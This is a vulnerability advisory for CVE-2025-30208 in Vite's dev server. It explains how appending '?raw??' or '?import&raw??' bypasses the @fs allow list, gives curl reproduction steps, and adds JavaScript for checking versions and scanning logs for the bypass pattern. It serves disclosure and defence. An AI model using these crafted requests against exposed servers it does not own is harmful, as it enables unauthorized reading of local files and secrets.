# CVE-2025-30208

## Summary

Vite dev server access control can be bypassed using crafted query strings, allowing arbitrary file reads via the @fs handler when the dev server is exposed to the network.

## Description

Vite’s dev server `@fs` access control can be bypassed by appending crafted query strings such as `?raw??` or `?import&raw??`, allowing reading arbitrary files outside the allowed serving list when the dev server is exposed to the network.

## Affected Package
- **Name:** vite
- **Ecosystem:** npm
- **Vulnerable versions:** >= 6.2.0 < 6.2.3, >= 6.1.0 < 6.1.2, >= 6.0.0 < 6.0.12, >= 5.0.0 < 5.4.15, < 4.5.10
- **Patched versions:** 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10
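To triage installed copies against the ranges above, here is an added JavaScript example (it is not part of the advisory and not Vite's own code). It encodes the vulnerable ranges exactly as listed in this section and compares a `MAJOR.MINOR.PATCH` string against them; `isVulnerableViteVersion`, `parseVersion` and `triageReport` are names chosen for this example, and a pre-release suffix (e.g. `6.2.0-beta.1`) is treated as its base version.

```javascript
// Added example (not Vite's code): does an installed vite version fall inside
// the vulnerable ranges listed in the advisory?

// Ranges copied from the "Vulnerable versions" line of the advisory, written as
// [lower bound inclusive (null = none), upper bound exclusive].
const VULNERABLE_RANGES = [
  ["6.2.0", "6.2.3"],
  ["6.1.0", "6.1.2"],
  ["6.0.0", "6.0.12"],
  ["5.0.0", "5.4.15"],
  [null, "4.5.10"],
];

// Parse "MAJOR.MINOR.PATCH" into three numbers. A leading "v" and any
// pre-release/build suffix are ignored (the base version is what is compared).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unrecognised version string: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Compare two parsed versions: negative, zero or positive, like strcmp.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// True when `version` lies inside any of the advisory's vulnerable ranges.
function isVulnerableViteVersion(version) {
  const v = parseVersion(version);
  return VULNERABLE_RANGES.some(([lo, hi]) => {
    const aboveLower = lo === null || compareVersions(v, parseVersion(lo)) >= 0;
    const belowUpper = compareVersions(v, parseVersion(hi)) < 0;
    return aboveLower && belowUpper;
  });
}

// One line per version, suitable for a fleet inventory report.
function triageReport(versions) {
  return versions.map(
    (v) => `vite@${v}: ${isVulnerableViteVersion(v) ? "VULNERABLE" : "patched / not affected"}`
  );
}

// Constructed sample versions, one on each side of every patched release.
console.log(
  triageReport(["3.2.0", "4.5.9", "4.5.10", "5.4.14", "5.4.15", "6.0.12", "6.2.2", "6.2.3"]).join("\n")
);
```

In practice the version string comes from `node_modules/vite/package.json` (the `version` field) in each project you inventory; the lockfile may list several copies, so check every one.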

## Details
The Vite dev server uses the `@fs` endpoint to serve files, denying access to paths outside the server’s allow list. However, the implementation removes trailing separators (such as `?`) in multiple places but does not account for them in query-string regex checks. By appending `?raw??` or `?import&raw??` to the URL, an attacker can bypass the `server.fs.deny` restriction and retrieve arbitrary file contents.

**Impact:** Only applications explicitly exposing the Vite dev server to the network (using `--host` or `server.host`) are affected. This enables remote disclosure of local files.

## Reproduction Steps
**Environment setup**
1. Install Node.js (LTS recommended).
2. Create and run a Vite dev server:
   ```bash
   npm create vite@latest
   cd vite-project
   npm install
   npm run dev
   ```
3. Create a file outside the project directory:
   ```bash
   echo "top secret content" > /tmp/secret.txt
   ```

**Steps**
1. Request the file normally (expected denial):
   ```bash
   curl "http://localhost:5173/@fs/tmp/secret.txt"
   ```
2. Request the file with the crafted query string:
   ```bash
   curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
   ```

**Expected vs. vulnerable behavior**
- Expected: server returns 403 “outside of Vite serving allow list.”
- Vulnerable: server returns file contents (e.g., `top secret content`).

## Indicators of Success
- A 403 response for the normal request, and a successful response containing the file contents when using `?import&raw??` (or `?raw??`).
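From the defender's side, the same indicators can be checked in HTTP access logs from the proxy or host in front of an exposed dev server. The following JavaScript is an added example, not part of the advisory and not Vite's code: it parses combined-log style lines (the format and the log lines are constructed for the example), flags `/@fs/` requests whose URL ends with the documented `?raw??` / `?import&raw??` suffixes as high confidence, flags any other `/@fs/` request carrying a stray `?` inside its query string as medium confidence, and records whether the request was denied (403) or served (200). `analyzeLine` and `scanLog` are this example's own names.

```javascript
// Added example (not Vite's code): scan access-log lines for requests that
// carry the CVE-2025-30208 bypass indicators and report whether they were served.

// Constructed sample log in combined-log style. Line 2 is the normal (denied)
// request from the reproduction steps, line 3 the crafted one that was served.
const SAMPLE_LOG = `
203.0.113.7 - - [10/Apr/2025:12:00:01 +0000] "GET /src/main.ts HTTP/1.1" 200 512
203.0.113.7 - - [10/Apr/2025:12:00:02 +0000] "GET /@fs/tmp/secret.txt HTTP/1.1" 403 0
203.0.113.7 - - [10/Apr/2025:12:00:03 +0000] "GET /@fs/tmp/secret.txt?import&raw?? HTTP/1.1" 200 19
203.0.113.7 - - [10/Apr/2025:12:00:04 +0000] "GET /@fs/tmp/notes.txt?raw?? HTTP/1.1" 403 0
198.51.100.9 - - [10/Apr/2025:12:00:05 +0000] "GET /src/App.vue?import&raw HTTP/1.1" 200 90
`.trim();

// client, ident, user, [timestamp], "METHOD URL PROTO", status, bytes
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;

// The two bypass suffixes documented in the advisory, anchored at the URL end:
// "...?raw??" and "...?import&raw??".
const KNOWN_BYPASS_RE = /(?:\?|&)(?:import&)?raw\?\?$/;

// Return a finding for one log line, or null when the line is not of interest.
function analyzeLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null; // not a line in the expected format
  const [, client, timestamp, method, url, status, bytes] = m;

  const q = url.indexOf("?");
  const path = q === -1 ? url : url.slice(0, q);
  const query = q === -1 ? "" : url.slice(q + 1);

  // Only the @fs handler is in scope for this advisory.
  if (!path.startsWith("/@fs/")) return null;

  let confidence = null;
  if (KNOWN_BYPASS_RE.test(url)) {
    confidence = "high"; // exactly the suffixes named in the advisory
  } else if (query.includes("?")) {
    confidence = "medium"; // a second '?' inside a Vite query is abnormal
  }
  if (confidence === null) return null;

  const code = Number(status);
  return {
    client,
    timestamp,
    method,
    path,
    query,
    status: code,
    bytes: bytes === "-" ? 0 : Number(bytes),
    confidence,
    // A 200 with a body means the allow-list denial was bypassed;
    // a 403 means the server refused the request (patched or attempt failed).
    served: code === 200,
  };
}

// Scan a whole log text and return the findings in order.
function scanLog(text) {
  return text.split(/\r?\n/).map(analyzeLine).filter(Boolean);
}

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(
    `${f.confidence.toUpperCase()} ${f.client} ${f.method} ${f.path}?${f.query} -> ${f.status} ` +
      (f.served ? "SERVED (bypass succeeded)" : "denied")
  );
}
```

A finding with `served: true` on a host running a version in the vulnerable ranges should be treated as a confirmed file disclosure of `path`; a denied attempt still shows that the dev server is reachable from that client, which is the precondition stated under Impact.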

## References
- https://nvd.nist.gov/vuln/detail/CVE-2025-30208
- https://github.com/advisories/GHSA-x574-m823-4x7w
- https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4
- https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c
- https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41
- https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca
- https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1

## Metadata

- Product: npm:vite
- Severity: medium
- Status: open
